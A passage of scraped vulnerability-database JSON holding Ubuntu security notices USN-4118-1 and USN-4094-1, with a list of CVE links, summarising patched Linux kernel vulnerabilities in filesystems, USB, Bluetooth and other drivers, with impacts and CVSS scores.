[CVE-2018-14617](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14617>)\n * [CVE-2018-16862](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16862>)\n * 
[CVE-2018-20169](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-20169>)\n * [CVE-2018-13097](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13097>)\n * [CVE-2018-13099](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13099>)\n * [CVE-2018-13100](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13100>)\n * [CVE-2018-14610](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14610>)\n * [CVE-2018-14611](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14611>)\n * [CVE-2018-14612](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14612>)\n * [CVE-2018-14613](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14613>)\n * [CVE-2018-14614](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14614>)\n * [CVE-2018-14616](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14616>)\n * [CVE-2018-13093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13093>)\n * [CVE-2018-13098](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13098>)\n * [CVE-2018-14615](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14615>)\n * [CVE-2018-20511](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20511>)\n * [CVE-2018-5383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5383>)\n * [CVE-2019-10126](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-10126>)\n * [CVE-2019-1125](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-1125>)\n * [CVE-2019-12614](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12614>)\n * [CVE-2019-3846](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-3846>)\n * [CVE-2019-13272](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-13272>)\n * [CVE-2018-20856](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-20856>)\n * [CVE-2019-12818](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12818>)\n * 
[CVE-2019-12819](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12819>)\n * [CVE-2019-12984](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12984>)\n * [CVE-2019-13233](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-13233>)\n * [CVE-2019-2024](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-2024>)\n * [CVE-2019-2101](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-2101>)\n", "edition": 1, "modified": "2019-09-30T00:00:00", "published": "2019-09-30T00:00:00", "id": "CFOUNDRY:40058483A2E2195544934D494FF464F7", "href": "https://www.cloudfoundry.org/blog/usn-4094-1/", "title": "USN-4094-1: Linux kernel vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:43:06", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14609", "CVE-2019-14763", "CVE-2019-15218", "CVE-2018-13053", "CVE-2019-15090", "CVE-2019-3900", "CVE-2018-14610", "CVE-2018-13096", "CVE-2019-0136", "CVE-2018-13098", "CVE-2019-14284", "CVE-2019-12984", "CVE-2019-10639", "CVE-2018-20784", "CVE-2019-15216", "CVE-2018-13100", "CVE-2019-15211", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2019-11085", "CVE-2018-13099", "CVE-2019-13272", "CVE-2019-9506", "CVE-2019-15215", "CVE-2019-13631", "CVE-2018-16862", "CVE-2019-11884", "CVE-2019-10207", "CVE-2019-15220", "CVE-2019-11810", "CVE-2019-11833", "CVE-2019-15212", "CVE-2019-11599", "CVE-2019-15221", "CVE-2018-14614", "CVE-2019-10638", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2019-3701", "CVE-2019-15292", "CVE-2019-11487", "CVE-2018-14612", "CVE-2019-2024", "CVE-2019-11815", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-15214", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-3819", "CVE-2018-19985", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613", "CVE-2019-14283"], "description": "It was 
discovered that the alarmtimer implementation in the Linux kernel \ncontained an integer overflow vulnerability. A local attacker could use \nthis to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux \nkernel did not properly track inode validations. An attacker could use this \nto construct a malicious XFS image that, when mounted, could cause a denial \nof service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the Linux \nkernel did not properly validate metadata. An attacker could use this to \nconstruct a malicious f2fs image that, when mounted, could cause a denial \nof service (system crash). (CVE-2018-13096, CVE-2018-13097, CVE-2018-13098, \nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14615, \nCVE-2018-14616)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system implementation \nin the Linux kernel did not properly validate metadata. An attacker could \nuse this to construct a malicious btrfs image that, when mounted, could \ncause a denial of service (system crash). (CVE-2018-14609, CVE-2018-14610, \nCVE-2018-14611, CVE-2018-14612, CVE-2018-14613)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux \nkernel did not properly handle malformed catalog data in some situations. \nAn attacker could use this to construct a malicious HFS+ image that, when \nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem \nof the Linux kernel did not properly initialize new files in some \nsituations. A local attacker could use this to expose sensitive \ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the Option USB High Speed driver \nin the Linux kernel did not properly validate metadata received from the \ndevice. 
A physically proximate attacker could use this to cause a denial of \nservice (system crash). (CVE-2018-19985)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux \nkernel did not properly handle size checks when handling an extra USB \ndescriptor. A physically proximate attacker could use this to cause a \ndenial of service (system crash). (CVE-2018-20169)\n\nZhipeng Xie discovered that an infinite loop could be triggered in the CFS \nLinux kernel process scheduler. A local attacker could possibly use this to \ncause a denial of service. (CVE-2018-20784)\n\nIt was discovered that a use-after-free error existed in the block layer \nsubsystem of the Linux kernel when certain failure conditions occurred. A \nlocal attacker could possibly use this to cause a denial of service (system \ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in \nthe Linux kernel did not properly validate elliptic curve parameters during \nDiffie-Hellman key exchange in some situations. An attacker could use this \nto expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that the Intel Wi-Fi device driver in the Linux kernel did \nnot properly validate certain Tunneled Direct Link Setup (TDLS). A \nphysically proximate attacker could use this to cause a denial of service \n(Wi-Fi disconnect). (CVE-2019-0136)\n\nIt was discovered that a heap buffer overflow existed in the Marvell \nWireless LAN device driver for the Linux kernel. An attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux \nkernel did not properly check for missing tty operations. A local attacker \ncould use this to cause a denial of service. 
(CVE-2019-10207)\n\nAmit Klein and Benny Pinkas discovered that the Linux kernel did not \nsufficiently randomize IP ID values generated for connectionless networking \nprotocols. A remote attacker could use this to track particular Linux \ndevices. (CVE-2019-10638)\n\nAmit Klein and Benny Pinkas discovered that the location of kernel \naddresses could be exposed by the implementation of connection-less network \nprotocols in the Linux kernel. A remote attacker could possibly use this to \nassist in the exploitation of another vulnerability in the Linux kernel. \n(CVE-2019-10639)\n\nAdam Zabrocki discovered that the Intel i915 kernel mode graphics driver in \nthe Linux kernel did not properly restrict mmap() ranges in some \nsituations. A local attacker could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code. (CVE-2019-11085)\n\nIt was discovered that an integer overflow existed in the Linux kernel when \nreference counting pages, leading to potential use-after-free issues. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2019-11487)\n\nJann Horn discovered that a race condition existed in the Linux kernel when \nperforming core dumps. A local attacker could use this to cause a denial of \nservice (system crash) or expose sensitive information. (CVE-2019-11599)\n\nIt was discovered that a null pointer dereference vulnerability existed in \nthe LSI Logic MegaRAID driver in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2019-11810)\n\nIt was discovered that a race condition leading to a use-after-free existed \nin the Reliable Datagram Sockets (RDS) protocol implementation in the Linux \nkernel. The RDS protocol is blacklisted by default in Ubuntu. If enabled, a \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. 
(CVE-2019-11815)\n\nIt was discovered that the ext4 file system implementation in the Linux \nkernel did not properly zero out memory in some situations. A local \nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the Bluetooth Human Interface Device Protocol (HIDP) \nimplementation in the Linux kernel did not properly verify strings were \nNULL terminated in certain situations. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2019-11884)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in \nthe Near-field communication (NFC) implementation in the Linux kernel. An \nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux kernel \nimproperly dropped a device reference in an error condition, leading to a \nuse-after-free. An attacker could use this to cause a denial of service \n(system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in \nthe Near-field communication (NFC) implementation in the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux kernel \nwhen accessing LDT entries in some situations. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux kernel did \nnot properly record credentials in some situations. A local attacker could \nuse this to cause a denial of service (system crash) or possibly gain \nadministrative privileges. (CVE-2019-13272)\n\nIt was discovered that the GTCO tablet input driver in the Linux kernel did \nnot properly bounds check the initial HID report sent by the device. 
A \nphysically proximate attacker could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code. (CVE-2019-13631)\n\nIt was discovered that the floppy driver in the Linux kernel did not \nproperly validate metadata, leading to a buffer overread. A local attacker \ncould use this to cause a denial of service (system crash). \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not \nproperly validate ioctl() calls, leading to a division-by-zero. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-14284)\n\nTuba Yavuz discovered that a race condition existed in the DesignWare USB3 \nDRD Controller device driver in the Linux kernel. A physically proximate \nattacker could use this to cause a denial of service. (CVE-2019-14763)\n\nIt was discovered that an out-of-bounds read existed in the QLogic QEDI \niSCSI Initiator Driver in the Linux kernel. A local attacker could possibly \nuse this to expose sensitive information (kernel memory). (CVE-2019-15090)\n\nIt was discovered that the Raremono AM/FM/SW radio device driver in the \nLinux kernel did not properly allocate memory, leading to a use-after-free. \nA physically proximate attacker could use this to cause a denial of service \nor possibly execute arbitrary code. (CVE-2019-15211)\n\nIt was discovered that a double-free error existed in the USB Rio 500 device \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service. (CVE-2019-15212)\n\nIt was discovered that a race condition existed in the Advanced Linux Sound \nArchitecture (ALSA) subsystem of the Linux kernel, leading to a potential \nuse-after-free. A physically proximate attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. 
\n(CVE-2019-15214)\n\nIt was discovered that a race condition existed in the CPiA2 video4linux \ndevice driver for the Linux kernel, leading to a use-after-free. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code. (CVE-2019-15215)\n\nIt was discovered that a race condition existed in the Softmac USB Prism54 \ndevice driver in the Linux kernel. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2019-15220)\n\nIt was discovered that a use-after-free vulnerability existed in the \nAppleTalk implementation in the Linux kernel if an error occurs during \ninitialization. A local attacker could use this to cause a denial of \nservice (system crash). (CVE-2019-15292)\n\nIt was discovered that the Empia EM28xx DVB USB device driver \nimplementation in the Linux kernel contained a use-after-free vulnerability \nwhen disconnecting the device. An attacker could use this to cause a denial \nof service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in the \nLinux kernel did not properly validate control bits, resulting in an out of \nbounds buffer read. A local attacker could use this to possibly expose \nsensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux \nkernel did not properly validate the BSS descriptor. A local attacker could \npossibly use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2019-3846)\n\nJason Wang discovered that an infinite loop vulnerability existed in the \nvirtio net driver in the Linux kernel. A local attacker in a guest VM could \npossibly use this to cause a denial of service in the host system. \n(CVE-2019-3900)\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper B. 
Rasmussen discovered \nthat the Bluetooth protocol BR/EDR specification did not properly require \nsufficiently strong encryption key lengths. A physically proximate attacker \ncould use this to expose sensitive information. (CVE-2019-9506)\n\nIt was discovered that the Appletalk IP encapsulation driver in the Linux \nkernel did not properly prevent kernel addresses from being copied to user \nspace. A local attacker with the CAP_NET_ADMIN capability could use this to \nexpose sensitive information. (CVE-2018-20511)\n\nIt was discovered that a race condition existed in the USB YUREX device \ndriver in the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2019-15216)\n\nIt was discovered that the Siano USB MDTV receiver device driver in the \nLinux kernel made improper assumptions about the device characteristics. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2019-15218)\n\nIt was discovered that the Line 6 POD USB device driver in the Linux kernel \ndid not properly validate data size information from the device. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2019-15221)\n\nMuyu Yu discovered that the CAN implementation in the Linux kernel in some \nsituations did not properly restrict the field size when processing \noutgoing frames. A local attacker with CAP_NET_ADMIN privileges could use \nthis to execute arbitrary code. (CVE-2019-3701)\n\nVladis Dronov discovered that the debug interface for the Linux kernel's \nHID subsystem did not properly validate passed parameters in some \nsituations. A local privileged attacker could use this to cause a denial of \nservice (infinite loop). 
(CVE-2019-3819)", "edition": 3, "modified": "2019-09-02T00:00:00", "published": "2019-09-02T00:00:00", "id": "USN-4118-1", "href": "https://ubuntu.com/security/notices/USN-4118-1", "title": "Linux kernel (AWS) vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:42:00", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14609", "CVE-2018-13053", "CVE-2018-14610", "CVE-2018-13096", "CVE-2018-13098", "CVE-2019-12984", "CVE-2018-13100", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2018-13099", "CVE-2019-13272", "CVE-2018-16862", "CVE-2018-14614", "CVE-2019-12614", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2018-14612", "CVE-2019-2024", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-1125", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613"], "description": "It was discovered that the alarmtimer implementation in the Linux kernel \ncontained an integer overflow vulnerability. A local attacker could use \nthis to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux \nkernel did not properly track inode validations. An attacker could use this \nto construct a malicious XFS image that, when mounted, could cause a denial \nof service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the \nLinux kernel did not properly validate metadata. An attacker could \nuse this to construct a malicious f2fs image that, when mounted, \ncould cause a denial of service (system crash). (CVE-2018-13097, \nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616, \nCVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nWen Xu and Po-Ning Tseng discovered that the btrfs file system \nimplementation in the Linux kernel did not properly validate \nmetadata. 
An attacker could use this to construct a malicious \nbtrfs image that, when mounted, could cause a denial of service \n(system crash). (CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, \nCVE-2018-14613, CVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux \nkernel did not properly handle malformed catalog data in some situations. \nAn attacker could use this to construct a malicious HFS+ image that, when \nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem \nof the Linux kernel did not properly initialize new files in some \nsituations. A local attacker could use this to expose sensitive \ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux \nkernel did not properly handle size checks when handling an extra USB \ndescriptor. A physically proximate attacker could use this to cause a \ndenial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block layer \nsubsystem of the Linux kernel when certain failure conditions occurred. A \nlocal attacker could possibly use this to cause a denial of service (system \ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in \nthe Linux kernel did not properly validate elliptic curve parameters during \nDiffie-Hellman key exchange in some situations. An attacker could use this \nto expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell \nWireless LAN device driver for the Linux kernel. An attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. 
(CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors \nincorrectly handle SWAPGS instructions during speculative execution. A \nlocal attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2019-1125)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel \ndid not properly check for allocation errors in some situations. A local \nattacker could possibly use this to cause a denial of service (system \ncrash). (CVE-2019-12614)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in \nthe Near-field communication (NFC) implementation in the Linux kernel. An \nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux kernel \nimproperly dropped a device reference in an error condition, leading to a \nuse-after-free. An attacker could use this to cause a denial of service \n(system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in \nthe Near-field communication (NFC) implementation in the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux kernel \nwhen accessing LDT entries in some situations. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux kernel did \nnot properly record credentials in some situations. A local attacker could \nuse this to cause a denial of service (system crash) or possibly gain \nadministrative privileges. (CVE-2019-13272)\n\nIt was discovered that the Empia EM28xx DVB USB device driver \nimplementation in the Linux kernel contained a use-after-free vulnerability \nwhen disconnecting the device. 
An attacker could use this to cause a denial \nof service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in the \nLinux kernel did not properly validate control bits, resulting in an out of \nbounds buffer read. A local attacker could use this to possibly expose \nsensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux \nkernel did not properly validate the BSS descriptor. A local attacker could \npossibly use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that the Appletalk IP encapsulation driver in the Linux \nkernel did not properly prevent kernel addresses from being copied to user \nspace. A local attacker with the CAP_NET_ADMIN capability could use this to \nexpose sensitive information. (CVE-2018-20511)", "edition": 2, "modified": "2019-08-13T00:00:00", "published": "2019-08-13T00:00:00", "id": "USN-4094-1", "href": "https://ubuntu.com/security/notices/USN-4094-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}]}